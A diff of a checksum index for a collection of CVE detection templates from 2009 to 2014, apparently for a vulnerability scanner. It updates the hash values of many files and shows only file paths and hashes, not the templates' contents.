http/cves/2009/CVE-2009-0347.yaml:5ce90e313f49f7c658c8208dc28b030f6ad68263 -http/cves/2009/CVE-2009-0545.yaml:b4854e41056f1f4f88bfdd1599ee38b8701fa0ac -http/cves/2009/CVE-2009-0932.yaml:cd229881a65cca2a507a2f19b7bd7040b7e6f3ac -http/cves/2009/CVE-2009-1151.yaml:fbb8a9780edd67f308652e8ca20f2e049753a369 +http/cves/2009/CVE-2009-0545.yaml:c7f9ecbf2085e123b198011f3fd387506a9e8a71 +http/cves/2009/CVE-2009-0932.yaml:6a85d3af6796f5e3dab7010769ac762444039fc1 +http/cves/2009/CVE-2009-1151.yaml:8dc096e55a97d8b7b97d856fa96e90726da5e66d http/cves/2009/CVE-2009-1496.yaml:3b7fd77b1a4aa689f73d36ecdb6b3e5fa5ad4367 http/cves/2009/CVE-2009-1558.yaml:7311f5b1b9a9fe041ce4ffbd34daf2e6fe0e7538 -http/cves/2009/CVE-2009-1872.yaml:394ba582c49eeda94980cd622fa95b3c7beefad3 +http/cves/2009/CVE-2009-1872.yaml:8657a5749e8a88ae4ba56e5b0b19c3464a6ae7b2 http/cves/2009/CVE-2009-2015.yaml:4694ca53378e410392946e729b2526d1220db192 -http/cves/2009/CVE-2009-2100.yaml:b1fed3abb29407f88d6faee5eba8919065b58874 +http/cves/2009/CVE-2009-2100.yaml:6bbdf6cca928b966076b4cddbd0668eef5331e0a http/cves/2009/CVE-2009-3053.yaml:68a597a8292c709a6f9490f4ff1fc4e75c1ef815 -http/cves/2009/CVE-2009-3318.yaml:974fd4cc88e3f89735bafc6002390f5951f84c75 -http/cves/2009/CVE-2009-4202.yaml:794900a596204e22965ff4ca20cb2c5281288aac -http/cves/2009/CVE-2009-4223.yaml:a8a1c50ee7caece6f3a124b4f9fcbcbfca624f3d +http/cves/2009/CVE-2009-3318.yaml:9ff69197adddbece5877c66bf06b8db0dc809919 +http/cves/2009/CVE-2009-4202.yaml:6bb8aa9ffd8f9764e6ed8c1a0558cde6ed7029a7 +http/cves/2009/CVE-2009-4223.yaml:a58ac563ac596712f2eaec11206e976d07406757 http/cves/2009/CVE-2009-4679.yaml:6fc53e452071d62d54f1e77aeb36669cdab21df2 -http/cves/2009/CVE-2009-5020.yaml:85051897dc73a81c97e10972db632f719a4918ee +http/cves/2009/CVE-2009-5020.yaml:bd0ef8373deacb3918d2a779286f03003f4db49f http/cves/2009/CVE-2009-5114.yaml:eed033fbf16521f4aba9fe6fddbef642c202a00b -http/cves/2010/CVE-2010-0157.yaml:ddef4fd4d27ec89abf52e89afd1238ebd8a9e8ac -http/cves/2010/CVE-2010-0219.yaml:97add297545c388a3f87790ff2daeaba38a84d08 -http/cves/2010/CVE-2010-0467.yaml:cbfe420f6148c4e7ec69d81ef7f9dccdaa2b8fd4 +http/cves/2010/CVE-2010-0157.yaml:950e30b71bb923174f57682b4022772c34d0cf03 +http/cves/2010/CVE-2010-0219.yaml:c02b48de176640720fb49210c96677b7dc75ab9c +http/cves/2010/CVE-2010-0467.yaml:2a28c465b90430beaa770b63044d2bc00ca7bbc1 http/cves/2010/CVE-2010-0696.yaml:73259ec73f220808622802ae226874d03de4a439 -http/cves/2010/CVE-2010-0759.yaml:d4efd62acda03f88acdff771a23e105c57da5620 -http/cves/2010/CVE-2010-0942.yaml:c2153bdc250c5cd2ce90325ce50096ad8b6521e1 +http/cves/2010/CVE-2010-0759.yaml:30831ecff561e842b6f472ea7cbb1ba54b85fa69 +http/cves/2010/CVE-2010-0942.yaml:f5cbdd272685133623fd425e6d33e0fb1733e3d4 http/cves/2010/CVE-2010-0943.yaml:d1fe9d2b4e08d5ea81e894c03d11b7bcbdb73bb3 http/cves/2010/CVE-2010-0944.yaml:bfaf0faec2899ff4a64cb1a41b4229d73fbfd6a6 -http/cves/2010/CVE-2010-0972.yaml:ddeb56e99bae15412ee93ee1cca6c3f43f2abba3 +http/cves/2010/CVE-2010-0972.yaml:e47087f278696e7b0e8904840e7d224727b6bf88 http/cves/2010/CVE-2010-0982.yaml:599bb1fb381fde5c20d5bcbcce1d55ba75512a52 http/cves/2010/CVE-2010-0985.yaml:ea6f8ee446653031d0a1f2ee0295e337a7f115d8 http/cves/2010/CVE-2010-1056.yaml:900582497ec305ba4fca6320cfc58b4975b3d751 -http/cves/2010/CVE-2010-1081.yaml:a9e63d0147ea276e4ef9b2fc035a96af99dac28f +http/cves/2010/CVE-2010-1081.yaml:d461a69be5c5267870cc70fad2dcca1339693f1c http/cves/2010/CVE-2010-1217.yaml:65a2add18d495fa4aee30dc5d70bb31a6fc9a437 http/cves/2010/CVE-2010-1219.yaml:f22b61d9fdc94d2e0611638f8adc881eee8481a9 http/cves/2010/CVE-2010-1302.yaml:6ad059078eeb8d7f3bfd2aec5e71cdd7ae6f3891 http/cves/2010/CVE-2010-1304.yaml:727f1f1679c1f1973b09e11ad131f2cbb15e7dea -http/cves/2010/CVE-2010-1305.yaml:2472be1c930d25b8ef09c04e9c0076ebdb6d3afe -http/cves/2010/CVE-2010-1306.yaml:302da19a1fa904a48cc109489628bcf1e3cb8721 -http/cves/2010/CVE-2010-1307.yaml:02c9440193acd85e94668ffbee5575c39f8483c7 -http/cves/2010/CVE-2010-1308.yaml:9f7f075061788b48cbf34a6bba23db64c2d2b45c -http/cves/2010/CVE-2010-1312.yaml:e060422c65a7d67a4e5bc1ea24c2a132fb2ffae6 -http/cves/2010/CVE-2010-1313.yaml:83220cba68d0bd8f0cb7400811a70ce5d08d70a2 +http/cves/2010/CVE-2010-1305.yaml:67a2a340abb039bb80a8d0fdae26e297af4fefef +http/cves/2010/CVE-2010-1306.yaml:86d5a2bea958b088e3346ed30aaa630b371e2edd +http/cves/2010/CVE-2010-1307.yaml:e11765da3157952bceebc8445909ceee612f9279 +http/cves/2010/CVE-2010-1308.yaml:7943dd6eab9e9df47150a03c293f9ebee95d49a8 +http/cves/2010/CVE-2010-1312.yaml:9fd9f03506ee1c8d65629ad0f4dabd7d02ba961f +http/cves/2010/CVE-2010-1313.yaml:15714bc34418e04e71c90da73b5ad0cde2f7fd86 http/cves/2010/CVE-2010-1314.yaml:e68e08b08120bd8612c9376f8b4a8f4562aa76ee http/cves/2010/CVE-2010-1315.yaml:8ae5fb46079488101b9c5e99a775d0f97dc98883 http/cves/2010/CVE-2010-1340.yaml:0c5648a4d0daa4d1915c4403fe656fa83bcc1ccd http/cves/2010/CVE-2010-1345.yaml:4e2d3d3329776cf5b14080ac31bee840bdd22646 http/cves/2010/CVE-2010-1352.yaml:0f001c6956c9fc5d200417b838d6a39fc23e353d -http/cves/2010/CVE-2010-1353.yaml:3e4b4d4ed60e0e4cab2c21797d8ae9884540408d -http/cves/2010/CVE-2010-1354.yaml:a8e32d056c74334fc86f716aa7a50515618fdf94 -http/cves/2010/CVE-2010-1429.yaml:36032d4688e465e068d6acb3916cbe87d982d72d -http/cves/2010/CVE-2010-1461.yaml:66ff1d52ed49414279f38a9ef66e21397033c681 -http/cves/2010/CVE-2010-1469.yaml:c4496478b863beaf50ec065b2d7251449346eadd +http/cves/2010/CVE-2010-1353.yaml:4481e610c4ae85c49bdb915f28cb73819042279e +http/cves/2010/CVE-2010-1354.yaml:dfd813c316d91c3f5020de9ce109a13e0c2c545e +http/cves/2010/CVE-2010-1429.yaml:38150df0a318c623b9f957bd48eb79149cda4be7 +http/cves/2010/CVE-2010-1461.yaml:22ff8d954f8aefe76461ec1bb45a5afae27f419d +http/cves/2010/CVE-2010-1469.yaml:184ebde7e35095d2bb953c855dc1ac36f1c45ab0 http/cves/2010/CVE-2010-1470.yaml:425cbc7cf9331292bc877c74171918b9b26233ed -http/cves/2010/CVE-2010-1471.yaml:5933d9fc11464aff303d9e3a6026416f3e893e9e +http/cves/2010/CVE-2010-1471.yaml:e9767437cfdb3112ee0af90b66a151b7ac488f72 http/cves/2010/CVE-2010-1472.yaml:05efa0d65dfd726f7800598f8a7d6f69bdf2ac28 -http/cves/2010/CVE-2010-1473.yaml:e322a26eadc2fc402fb215602159fea2821345bb -http/cves/2010/CVE-2010-1474.yaml:d5770393c9bf13d7b60aec65acaab2417ad19e63 +http/cves/2010/CVE-2010-1473.yaml:1a884946a3b1c4d2f21358885422c76e1c546bb2 +http/cves/2010/CVE-2010-1474.yaml:08e6e6d4a21096f7d84d3fcc7b50a77767577217 http/cves/2010/CVE-2010-1475.yaml:ba1533465a3c2032e7bbe8babc2aa2e33279217a -http/cves/2010/CVE-2010-1476.yaml:cb4315adfa0bde7ffd51d2a3e6de28bb6c11ec21 +http/cves/2010/CVE-2010-1476.yaml:7890f7de322b9e0b96d7eb965cd4bdf8e7facc0e http/cves/2010/CVE-2010-1478.yaml:30788df9e30a86e49a95dbe857ba7d6f88895b35 http/cves/2010/CVE-2010-1491.yaml:81c825592c5b5b85645945be1cd9d88c4f88df9d -http/cves/2010/CVE-2010-1494.yaml:28b3a504c10ea35e84a8e5ab55d46b96d1068ed2 +http/cves/2010/CVE-2010-1494.yaml:8b520da8bf3985db0e217c289d806ce5fd9a2d50 http/cves/2010/CVE-2010-1495.yaml:fd08efd24fe096d136458eebabaf285744e07e0a http/cves/2010/CVE-2010-1531.yaml:37431ef4763a68b3568e8a486d81cf5e1643d80a -http/cves/2010/CVE-2010-1532.yaml:438cdd173e4a31325ea27aea246aab2c4c34c14e -http/cves/2010/CVE-2010-1533.yaml:cbc6ad1e85e13bc8cb630ab2c364643d413fa0af -http/cves/2010/CVE-2010-1534.yaml:03dbcea8eaffe21f469180d5993ee5afbdbacfa7 -http/cves/2010/CVE-2010-1535.yaml:80d65e19fc2ed303d5cc8adb820232f44893202b +http/cves/2010/CVE-2010-1532.yaml:81da2999d656843c4f582b4295651a7ef0ba7dd7 +http/cves/2010/CVE-2010-1533.yaml:743b6a096195b8ea287119bfd574136648f1d711 +http/cves/2010/CVE-2010-1534.yaml:e56bd300d4e208ef033a7a9c0d85c99c441890e3 +http/cves/2010/CVE-2010-1535.yaml:5decf50fd0a035aebb67f4bbb938af0d6a7ca136 http/cves/2010/CVE-2010-1540.yaml:eaf66df28d06a8f26b2c99f262d92b1340a42b16 http/cves/2010/CVE-2010-1586.yaml:d58c94874f5a6501a136f572f673c8b805d8ae9b http/cves/2010/CVE-2010-1601.yaml:b4aafeb36e3e33aeb3edd3b955b4953db25705ea -http/cves/2010/CVE-2010-1602.yaml:cca603ccbfdc146605d757fabdf6a1aa6e37cfed +http/cves/2010/CVE-2010-1602.yaml:0bf601a88a5f2213c172f4ff817e3bd2dc9e446d http/cves/2010/CVE-2010-1603.yaml:b6188b9d88e5d2351979796ebb3270d3fde53be9 -http/cves/2010/CVE-2010-1607.yaml:220efc2f1c0b9f145d04ec1cc0efc479157838d7 -http/cves/2010/CVE-2010-1653.yaml:6750c406d14955dd9e2c8feeb78178f3f0076547 -http/cves/2010/CVE-2010-1657.yaml:73d665d3d27f4bf152014ec82f56028e16f16abf +http/cves/2010/CVE-2010-1607.yaml:383a5834d2af2c9e953b6656a676cc5fb5bd86ca +http/cves/2010/CVE-2010-1653.yaml:461aca038a9faf55b9e4ad7c5cb8b24523f13246 +http/cves/2010/CVE-2010-1657.yaml:f3040ebeda1902bdd736bebc84c3134525692228 http/cves/2010/CVE-2010-1658.yaml:7822fc55851a3db8a17932d981cd1249270a1fcd -http/cves/2010/CVE-2010-1659.yaml:f6b62072548aa907fa67787167cbb82d9d763324 +http/cves/2010/CVE-2010-1659.yaml:1f39675facb5774046bbef8b06b5899ab2ac18a0 http/cves/2010/CVE-2010-1714.yaml:b9fc204e8b85ee36b0f15a8da385448b2dd2fbce -http/cves/2010/CVE-2010-1715.yaml:daed63a42610d953dad924ab3139fcc62044d756 +http/cves/2010/CVE-2010-1715.yaml:53074615708c1c4f6bf5049cf5447affe828465b http/cves/2010/CVE-2010-1717.yaml:ccf1a65be89b0c388cc9f71c28d0d6b51a17b743 -http/cves/2010/CVE-2010-1718.yaml:aa32181a904283d0e32744973e5b8be429273193 +http/cves/2010/CVE-2010-1718.yaml:df1c72fc97a5e4c4301b15df30b2dd19957dbc63 http/cves/2010/CVE-2010-1719.yaml:81f15e4304779eb24cba200b01099889e5140a74 http/cves/2010/CVE-2010-1722.yaml:75137a1adbb8ebcbb47642b983d93983a3f276c9 -http/cves/2010/CVE-2010-1723.yaml:45f2313b13af972e214edd03a86ef58149328b1a +http/cves/2010/CVE-2010-1723.yaml:8b54bddf0e5f6757d1ce9cba44a93386e8ef4632 http/cves/2010/CVE-2010-1858.yaml:47fdeb1cfc6c33db3a6fbc3b6f841e5738c5524d -http/cves/2010/CVE-2010-1870.yaml:321316a994f71a408dc53de7fbc83f07b47c3714 +http/cves/2010/CVE-2010-1870.yaml:bb2835745b04eecff40eac1bcbd77c04e2412723 http/cves/2010/CVE-2010-1875.yaml:153037344f618b22315b5cb6c764f56e6020e115 http/cves/2010/CVE-2010-1878.yaml:e376a84dae26f6d3b0cce191c22e273523736ed2 -http/cves/2010/CVE-2010-1952.yaml:4e23bfee74560418ea78ed1fa6bbd3d164d86e14 -http/cves/2010/CVE-2010-1953.yaml:92593bf4c6168db596ce32760588f97b76add554 +http/cves/2010/CVE-2010-1952.yaml:4c2889583512c97a6a66ec527acc778d77792240 +http/cves/2010/CVE-2010-1953.yaml:e091d239b1ef9ceb20ba5d9338cbf5238491d9e6 http/cves/2010/CVE-2010-1954.yaml:7935cf23b4feb5d1cd7668642ff36fa87c41a759 -http/cves/2010/CVE-2010-1955.yaml:cee09885c3fe1dea578218c5b63469f2fd3cd905 -http/cves/2010/CVE-2010-1956.yaml:9cae094ac7f90ea7c74afd1ac7f6ca72cb26ad44 -http/cves/2010/CVE-2010-1957.yaml:f3d0975a0cd41bcbdc55fc95cad0f3a92a7b05c6 -http/cves/2010/CVE-2010-1977.yaml:323af1f37f4bafc02c35680b3b5f25c65dc1012e +http/cves/2010/CVE-2010-1955.yaml:dcb874bcdba0efeb430975f8cd5127b6815f60ae +http/cves/2010/CVE-2010-1956.yaml:01b13cc909f5f201ac8ef4e1c883ecddf8cb3615 +http/cves/2010/CVE-2010-1957.yaml:cd4b276eb4b4fa3cbd962409f2a6d9e3d23cb8d6 +http/cves/2010/CVE-2010-1977.yaml:45955fdad4bd60abfa0939a1f7ad6d64243f70d1 http/cves/2010/CVE-2010-1979.yaml:0ddddf83b9d40873443db4a31de2ebedbdc1a8bc http/cves/2010/CVE-2010-1980.yaml:d46da5ed40593b05c99310de3c3cf02b596f785c http/cves/2010/CVE-2010-1981.yaml:b1c467846895e76100a2ce986bbd364c7ef11875 -http/cves/2010/CVE-2010-1982.yaml:ba5aa35d9543a73569b8db46278243d8b818463b +http/cves/2010/CVE-2010-1982.yaml:55fa02576aa3ae20a65183ca3186069fa806d6f8 http/cves/2010/CVE-2010-1983.yaml:d8d03db95a52020abedb493b3f4cd0050c166b3b http/cves/2010/CVE-2010-2033.yaml:6897fa1eb808a4ad1dd8f1980c3128050da1a9c6 http/cves/2010/CVE-2010-2034.yaml:ed205dcf43b360b3b9380b59380607610c6db446 http/cves/2010/CVE-2010-2035.yaml:343a15271ba30a258277c2d62a2ac0b32eae4a7a -http/cves/2010/CVE-2010-2036.yaml:987ff41eb17287615f545e61109562af0e4e11ac -http/cves/2010/CVE-2010-2037.yaml:9cb8477ccf1880daf9122b815722304234537b39 +http/cves/2010/CVE-2010-2036.yaml:e15f376a2171fd2d2e55e99907cf7fe74244551c +http/cves/2010/CVE-2010-2037.yaml:7bfb032acaab69c6117c5d8facda6543281db3d5 http/cves/2010/CVE-2010-2045.yaml:da2b1830c10d0a89cc941fe7c6b0eec0164efe12 -http/cves/2010/CVE-2010-2050.yaml:0769276e076f4cfd3fa7d1a3ff7ceaa339828ca6 +http/cves/2010/CVE-2010-2050.yaml:2c65bfd5b4066f7e9ca8c0c4f38395a301d466c5 http/cves/2010/CVE-2010-2122.yaml:3e2a4991e90707a57e0770920aa0f55a12b5efc5 http/cves/2010/CVE-2010-2128.yaml:7e08cbdba6e319549864dcd168316626d1fec1a5 http/cves/2010/CVE-2010-2259.yaml:7ee9cb7d015a35ae5db7d2b21dc21eee66b1335f http/cves/2010/CVE-2010-2307.yaml:974a029d715d0b35c48ae0152129a4eb67bc72c5 -http/cves/2010/CVE-2010-2507.yaml:374cf4047e37632490fbdfc825fce2eb1b5c7e58 -http/cves/2010/CVE-2010-2680.yaml:8a3e803dff818279452703ce45b1ceb5b0d7a328 +http/cves/2010/CVE-2010-2507.yaml:a7d4c681213119f3c275846d077e817bef44d5e6 +http/cves/2010/CVE-2010-2680.yaml:abbf84831ad4ea9ed18e4185380d214afbfbde14 http/cves/2010/CVE-2010-2682.yaml:55d668ece64b7ec7b966b2979e89092420f94fa2 http/cves/2010/CVE-2010-2857.yaml:2e5ec92cf7a36d86f01ff057ec26939b1877a8d5 -http/cves/2010/CVE-2010-2861.yaml:649c467d63ee9eeb2a84cd5c4be98baf86ccaf27 -http/cves/2010/CVE-2010-2918.yaml:0d785499476f3aba502f9a5d40039f9d38d01330 +http/cves/2010/CVE-2010-2861.yaml:0f5d97f78cc1f78be327bf9b67668b5146a04aa3 +http/cves/2010/CVE-2010-2918.yaml:fdd7c2962f11d92aefd3a974869c53ed44400ebf http/cves/2010/CVE-2010-2920.yaml:f32fc44594b039fd382f339f9ac42d0d9858a60b -http/cves/2010/CVE-2010-3203.yaml:e9aafd881e5ed1c311f7960188aaade5eff50e12 +http/cves/2010/CVE-2010-3203.yaml:000a8f0c4dcf829e67fe60c966debd95143f899f http/cves/2010/CVE-2010-3426.yaml:8fbd7d692e79dc4e64334f330432896ca80e1e8a -http/cves/2010/CVE-2010-4231.yaml:51bdd2463b062dd515ebd1cd667897d559732db7 -http/cves/2010/CVE-2010-4239.yaml:c4050ca6a9a1ba60621e66783f85213759b64d96 -http/cves/2010/CVE-2010-4282.yaml:a6a60700c9e220d86947b9b5bf65cedc3839e03a +http/cves/2010/CVE-2010-4231.yaml:95061e8a83ae97b5bc5f257526742084ee228267 +http/cves/2010/CVE-2010-4239.yaml:70dfd38979f322a9c84edfc3f3439c7e6eaca447 +http/cves/2010/CVE-2010-4282.yaml:eca8fb47c4f137ee769a8ce8170e5feea53475c0 http/cves/2010/CVE-2010-4617.yaml:890b0e647d804ad358fdfd64173d51fbbf168ef1 http/cves/2010/CVE-2010-4719.yaml:6c0dc775334d3f436a198b83d84a98acf172da6a http/cves/2010/CVE-2010-4769.yaml:d677d549a83a06d3a26b105a7f9d42161b491ca4 -http/cves/2010/CVE-2010-4977.yaml:9e5b7253a99c393814e0f3cfbd27992dfa336274 -http/cves/2010/CVE-2010-5028.yaml:0ffbc4395e4046ada43652a0e0fa672cdad14a7c -http/cves/2010/CVE-2010-5278.yaml:8a60614e73e0cf3b1ffbb76269b13b7921535de6 -http/cves/2010/CVE-2010-5286.yaml:ccf9698bf9602866e9d6b800f766c5a9c893ebb9 -http/cves/2011/CVE-2011-0049.yaml:a13d91484a5b80a35520ea575a0c4032deb34b57 +http/cves/2010/CVE-2010-4977.yaml:44aade6d6155014fe33a8ec57e7898212331104e +http/cves/2010/CVE-2010-5028.yaml:c396646a343f1230675d7db4de16eaf675e26e7a +http/cves/2010/CVE-2010-5278.yaml:4b551326a6f84dc58285d03101811b8ae002aba8 +http/cves/2010/CVE-2010-5286.yaml:992dcc1f927e19df7e91041994ebba411d0c287b +http/cves/2011/CVE-2011-0049.yaml:d4ae5f76935775886bf63bfac0a0ea93947e3a74 http/cves/2011/CVE-2011-1669.yaml:b790ebc1bb9519722ffd34b342f8d4eca798ecb2 -http/cves/2011/CVE-2011-2744.yaml:03ab85cc38bad602f3bae9309d6d9e94a3ef8ca6 -http/cves/2011/CVE-2011-2780.yaml:509b32f8c34ec3ac54c7f5d68eca51c8d420f68f +http/cves/2011/CVE-2011-2744.yaml:e75a2a3b77597ee4b6eadb57cc5a878859099de0 +http/cves/2011/CVE-2011-2780.yaml:cd61fcc85be0dd1ad856d5d42c1b0d8becf32ca5 http/cves/2011/CVE-2011-3315.yaml:a0377daef14d191981a0f569ca9c7d5816b34809 -http/cves/2011/CVE-2011-4336.yaml:304c44d51a1936102439ea5d3b93753c3048e0ae +http/cves/2011/CVE-2011-4336.yaml:da0baea9d73290dee0d3ed225841560e1736a9a3 http/cves/2011/CVE-2011-4618.yaml:43b9dc16cda0cbffcc4ee7b6bfb7390ef291deae http/cves/2011/CVE-2011-4624.yaml:67aec04578dce4d171c7e6a30f6101a4f35537d8 -http/cves/2011/CVE-2011-4640.yaml:a420fc3b17a88aa376e17b9aeeececfcb7a85698 -http/cves/2011/CVE-2011-4804.yaml:b834bce15f99648a9aa69e020e115d9d1743ef0f -http/cves/2011/CVE-2011-4926.yaml:07d0e425cd96d336ea822358a49ff41821a63c3d -http/cves/2011/CVE-2011-5106.yaml:2f518834abd8cddb17b5116bb85f009ddf8cddc2 +http/cves/2011/CVE-2011-4640.yaml:92182b7d6ce6e598ba082f300a2d3fcb7a81c381 +http/cves/2011/CVE-2011-4804.yaml:5f7d69e922d525bcaed5e0f3363e99abb1742866 +http/cves/2011/CVE-2011-4926.yaml:4623078a9e2f41dcb7faab66c37f210c2ace9e21 +http/cves/2011/CVE-2011-5106.yaml:f411f9f73e789680f95b18aced081d080c822470 http/cves/2011/CVE-2011-5107.yaml:6500479dea5a2baa7dda98cf15ac603c80dd88ee http/cves/2011/CVE-2011-5179.yaml:6b1bc0308f5843e6e8214c7689ed7ce2cdd3d067 -http/cves/2011/CVE-2011-5181.yaml:2c742ddf13d80ab9705095f5c04863acf5effc53 +http/cves/2011/CVE-2011-5181.yaml:da332c9c71b49255b7372933d6e043a6ef920e0f http/cves/2011/CVE-2011-5252.yaml:cd6677a2e68a410e579dca0dbfb4b0f6cdd87bee -http/cves/2011/CVE-2011-5265.yaml:3629299c7ab9174df7d8588184536146bc4c9aaf -http/cves/2012/CVE-2012-0392.yaml:e4a19a213ec6890934b32339c1bc1a595f3c5f7e -http/cves/2012/CVE-2012-0394.yaml:3111ae42d043d8619a922208aaa998cae6f28b86 -http/cves/2012/CVE-2012-0896.yaml:6d15a7d9bc6d3be722d5d4ed979998577d8b9ed4 -http/cves/2012/CVE-2012-0901.yaml:cc4676f6b8f1025af8450441cc345d61d191097c -http/cves/2012/CVE-2012-0981.yaml:54410413b227a7979de56f35b31dc2e865f07676 -http/cves/2012/CVE-2012-0991.yaml:08d3cf09600f775ce531adf5e966547525d8b4dc -http/cves/2012/CVE-2012-0996.yaml:84b125282e0096629de4adacc5b9b6e1db7234f3 -http/cves/2012/CVE-2012-1226.yaml:b9aefa26324f852d4d716dbb330845b0d557b935 -http/cves/2012/CVE-2012-1823.yaml:1bc5e1ca0c4b8fbd5170219da23eaacbbd4f5bac -http/cves/2012/CVE-2012-1835.yaml:9ef03cd62c044d41781e930a335d6ea02ebc71dd -http/cves/2012/CVE-2012-2371.yaml:d35fa4dae38879bc87e8c1927beb360c6ca07940 -http/cves/2012/CVE-2012-3153.yaml:4f5f8dd92c3bb79b73f5e096b157fa434d06dade +http/cves/2011/CVE-2011-5265.yaml:ef1fc0051980989f0fa31ae918c337a47a442db4 +http/cves/2012/CVE-2012-0392.yaml:7c64dbe978e836fc59f6fe89079f873f75b1721a +http/cves/2012/CVE-2012-0394.yaml:3ab9ca9bbcc1d4b09c6bedef8f16cac4046daca9 +http/cves/2012/CVE-2012-0896.yaml:6498f3a54562aa157b18d08b02019ba3e358abf4 +http/cves/2012/CVE-2012-0901.yaml:546493d6d7a6c219656b5977b297de328c74dfe4 +http/cves/2012/CVE-2012-0981.yaml:4fb0cb2ce3a9d97e83dfa0d6a57bf66a7c22ea01 +http/cves/2012/CVE-2012-0991.yaml:eaced68f949dc463ae65022d791fe72f15da690b +http/cves/2012/CVE-2012-0996.yaml:891c0651137f2e947c6b1b9e438cba3edb33ec77 +http/cves/2012/CVE-2012-1226.yaml:3de9396fb896c545ce2f8e8a121e0203565bc963 +http/cves/2012/CVE-2012-1823.yaml:da276ae6c59ea82eb9dee085c7bc8f3e6de4f7df +http/cves/2012/CVE-2012-1835.yaml:4dfa20f76fbaab9369e068c7e768b62db01016cb +http/cves/2012/CVE-2012-2371.yaml:010260ccc1dec8ac14c6288bfe9789c28817fed5 +http/cves/2012/CVE-2012-3153.yaml:7745803a79c081e0d4cf1ab008315da194440504 http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 -http/cves/2012/CVE-2012-4242.yaml:5702dfb9eb0dc70a806354645d5581b711c44aff +http/cves/2012/CVE-2012-4242.yaml:c0f6cf73a75459db549d052fc5621421c16c07e1 http/cves/2012/CVE-2012-4253.yaml:b751e39074389ddfe21a53c9639721af4366933d -http/cves/2012/CVE-2012-4273.yaml:ea232cd1dac8f5f9395da88bf4af057aa5df281f -http/cves/2012/CVE-2012-4547.yaml:1a368b287bf2d7a5cf4e2a8bb2262c9947e345a8 -http/cves/2012/CVE-2012-4768.yaml:816e62117eca9cae9747d85abe513b4c74bb6245 -http/cves/2012/CVE-2012-4878.yaml:adab7b06d1898a824aeb36aedbb3e8ed3794be18 -http/cves/2012/CVE-2012-4889.yaml:5508ad452b4b356da8b934e6de9abc1deae05be4 +http/cves/2012/CVE-2012-4273.yaml:f257338bd89ce77ac23d22e5beb22d089492fd2b +http/cves/2012/CVE-2012-4547.yaml:b5596c4a4096d71d32c140095bcc319dfdbfa17a +http/cves/2012/CVE-2012-4768.yaml:21af07fadcfe0dc640ce7ff9d1f4a1b228fdc86a +http/cves/2012/CVE-2012-4878.yaml:1ef5a93dda472a401d0e59d4e7e8382441ef842c +http/cves/2012/CVE-2012-4889.yaml:9e23549c59a9109c5c9e1a4ad29fc0537cc59037 http/cves/2012/CVE-2012-4940.yaml:0788c7af85578fd5462ba3646fe3a489281a3326 -http/cves/2012/CVE-2012-4982.yaml:defe2c394ce76e59123751467989546fdedb477b -http/cves/2012/CVE-2012-5321.yaml:c3c959cd4139018f9dc6d83e0dd48e9ceb5d40cb -http/cves/2012/CVE-2012-5913.yaml:d1292669a7ac4def883f124182b062b202023751 -http/cves/2012/CVE-2012-6499.yaml:44bcad77ce9332946506dce70c593c7407df4982 -http/cves/2013/CVE-2013-1965.yaml:9f5ea4e2ede3e57a760b78bba35df5a25f97b096 -http/cves/2013/CVE-2013-2248.yaml:0f5c75886160f8c45398025d59c33a09cc7555ff -http/cves/2013/CVE-2013-2251.yaml:6451e30038014299e998aa93b46bd63d7b6cef90 -http/cves/2013/CVE-2013-2287.yaml:740ca6d675d5d036e8bb8c442b401f100cd192e1 +http/cves/2012/CVE-2012-4982.yaml:fa88c9844f314ec9df1cd44e460349e3a059cc03 +http/cves/2012/CVE-2012-5321.yaml:36fde02c90c4dbe92b7e3b91a097fdc47ea72622 +http/cves/2012/CVE-2012-5913.yaml:5879951c8bd0c95f891b1d4d905fdb30a58514a7 +http/cves/2012/CVE-2012-6499.yaml:ad1f16e453fb178d32bfe6d97ec0c43da94f89c5 +http/cves/2013/CVE-2013-1965.yaml:420bbbd2807e0e9ca792eca0b3276c4e9f33d532 +http/cves/2013/CVE-2013-2248.yaml:e57458e18f8bf89c1c94678413ff15e8770afd60 +http/cves/2013/CVE-2013-2251.yaml:8eb669224beb43e0a5fb9ccc459495b67b116a01 +http/cves/2013/CVE-2013-2287.yaml:eb52bfef9137b46e70a13c0fd474d1f0dd2d4656 http/cves/2013/CVE-2013-2621.yaml:b119a307b339c8bdf9fd8de85ac33095943fe5bd -http/cves/2013/CVE-2013-3526.yaml:f1bb7a19ec36fb857d7b3e9e40c311b35b8dee10 -http/cves/2013/CVE-2013-3827.yaml:b455050804bef00178fe71c47df37e560c227d62 -http/cves/2013/CVE-2013-4117.yaml:e3af3d8b6e5aa118193d40d0111ce652f62807c3 -http/cves/2013/CVE-2013-4625.yaml:708eebdc6371b8866230b4dbfb68d3bf21b09d12 +http/cves/2013/CVE-2013-3526.yaml:053fb4c1ba82c992e5006914d806c5f7ad89c591 +http/cves/2013/CVE-2013-3827.yaml:bb6196380c0971025f32a3bb62ab1262fc1feda6 +http/cves/2013/CVE-2013-4117.yaml:507a06ea58b71624b0c31c362506ee171b939391 +http/cves/2013/CVE-2013-4625.yaml:3b0e121cf1eb47258d888c4ecdd220790a2d2514 http/cves/2013/CVE-2013-5528.yaml:b9dd20d30e2aec7bf16c605678c6489ee1d01cea -http/cves/2013/CVE-2013-5979.yaml:827c8db3d7998dd30cd139dc39662de36bc7199d -http/cves/2013/CVE-2013-6281.yaml:43b0fc6630c8c1c343d4028c0408d9266c4d6025 -http/cves/2013/CVE-2013-7091.yaml:3edf95098b7b7bb53891943a708eddd26a2f5f26 -http/cves/2013/CVE-2013-7240.yaml:b4bd306b198efb89e46f6d280ea28dc091c9da7f +http/cves/2013/CVE-2013-5979.yaml:c1439b35c3ea1ab4d7f5ed19ccc670b75094c431 +http/cves/2013/CVE-2013-6281.yaml:a8aca0c3a8f4ca7f993970d911143adde9144d8e +http/cves/2013/CVE-2013-7091.yaml:e238a53f639eb74a475752c5356e01e1150f95fc +http/cves/2013/CVE-2013-7240.yaml:4ff6b9c5fc7d8c94d20690a220d7618948a20b86 http/cves/2013/CVE-2013-7285.yaml:b736c63de6a3a9021e2959f2758b08d4361d2dcd http/cves/2014/CVE-2014-10037.yaml:0ef395d3b049fc99af52a0d7ca44ee7d029b1048 -http/cves/2014/CVE-2014-1203.yaml:af8b996d5f9e2adcac4ac435e1654d25e613e918 -http/cves/2014/CVE-2014-2321.yaml:df3f2c107beedfa4774501d2ce5ce1d221fa4ebb -http/cves/2014/CVE-2014-2323.yaml:af8806fdc853257647a4aee490070ec3e11e10ee -http/cves/2014/CVE-2014-2383.yaml:c0890d0099e9e4c4423d441cba21b8da5bf5517f 